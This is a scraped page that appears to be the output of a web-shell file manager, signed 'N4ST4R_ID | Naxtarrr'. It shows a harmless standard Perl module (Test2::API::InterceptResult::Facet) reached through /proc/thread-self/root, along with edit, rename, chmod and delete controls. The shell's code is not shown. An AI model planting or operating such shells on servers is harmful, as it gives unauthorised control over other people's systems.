Submit
Path:
~
/
/
proc
/
thread-self
/
root
/
usr
/
share
/
perl
/
5.34.0
/
Test2
/
API
/
InterceptResult
/
File Content:
Facet.pm
package Test2::API::InterceptResult::Facet; use strict; use warnings; our $VERSION = '1.302183'; BEGIN { require Test2::EventFacet; our @ISA = ('Test2::EventFacet'); } our $AUTOLOAD; sub AUTOLOAD { my $self = shift; my $name = $AUTOLOAD; $name =~ s/^.*:://g; return undef unless exists $self->{$name}; return $self->{$name}; } sub DESTROY {} 1;
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
Event.pm
28637 bytes
0644
Facet.pm
380 bytes
0644
Hub.pm
967 bytes
0644
Squasher.pm
3674 bytes
0644
N4ST4R_ID | Naxtarrr